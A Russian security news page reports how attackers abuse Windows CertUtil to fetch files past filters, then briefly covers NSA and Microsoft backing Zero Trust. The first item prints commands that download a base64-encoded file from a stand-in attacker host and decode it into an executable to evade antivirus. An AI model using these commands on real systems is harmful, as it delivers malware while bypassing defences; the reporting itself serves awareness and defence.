CertUtil.exe позволяет загружать вредоносные файлы в обход фильтрам

CertUtil.exe позволяет загружать вредоносные файлы в обход фильтрам

Эксперты в области безопасности обеспокоены использованием киберпреступниками встроенной в Windows программы CertUtil во вредоносных целях. CertUtil предназначена для управления сертификатами в Windows, с помощью этой программы вы можете устанавливать, создавать резервную копию, удалять и управлять хранилищами сертификатов в Windows.

Одной из особенностей CertUtil является возможность загрузить сертификат или любой другой файл по удаленному URL-адресу, сохранив его в виде локального файла. Для этого используется следующий синтаксис: «certutil.exe -urlcache -split -f [URL] output.file».

Еще в 2017 году исследователь Кейси Смит в Twitter выразил обеспокоенность тем, что этот метод можно использовать для загрузки вредоносных программ.

Опасения Смита подтвердились, так как недавно обнаруженный троян с марта этого года использует этот метод для загрузки различных пакетных файлов и сценариев на зараженный компьютер.

В качестве преимущества этого механизма загрузки вредоносных файлов эксперты называют возможность обойти различные фильтры, которые бы не позволили сделать это любой другой программе.

Ксавье Мертенс, консультант по вопросам безопасности, опубликовал свою версию использования CertUtil для загрузки злонамеренного содержимого. Чтобы параллельно обойти антивирусные сканеры, Мертенс предлагает кодировать файл при помощи base64, что позволит представить его как безобидный текст.

После загрузки текстового файла команда «certutil.exe -decode» может использоваться для декодирования файла в исполняемый:

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe

Более того, некоторые специалисты сообщают о том, что такой метод уже используется киберпреступными группами.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

АНБ США и Microsoft призывают использовать модель Zero Trust для защиты

Агентство национальной безопасности (АНБ) США и Microsoft выступили за использование модели Zero Trust («нулевое доверие»), поскольку, по их мнению, она позволяет корпорациям более эффективно защищаться от постоянно развивающихся киберугроз.

Про модель Zero Trust мы писали летом прошлого года, акцентируя внимание на постепенном устаревании и недостаточности привычной защиты сетевого периметра.

Принцип «нулевого доверия» обсуждается с 2010 года, а после крупнейших атак на НАТО власти США призвали государственные учреждения перейти на модель Zero Trust. Как известно, этот подход позволяет защитить организации без явного периметра.

Благодаря недавним кампаниям злоумышленников, направленным на цепочки поставок SolarWinds, разговоры о Zero Trust в среде специалистов по кибербезопасности стали ещё активнее.

Одним из сторонников «нулевого доверия» является нынешний глава Microsoft Брэд Смит. По мнению Смита, эта концепция как нельзя лучше подходит организациям и агентствам, которые хотят убедиться в защищённости своих сетей.

Приблизительно такой же позиции придерживается Агентство национальной безопасности США, рекомендующее (PDF) внедрить модель «нулевого доверия» для критически важных и государственных сетей.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru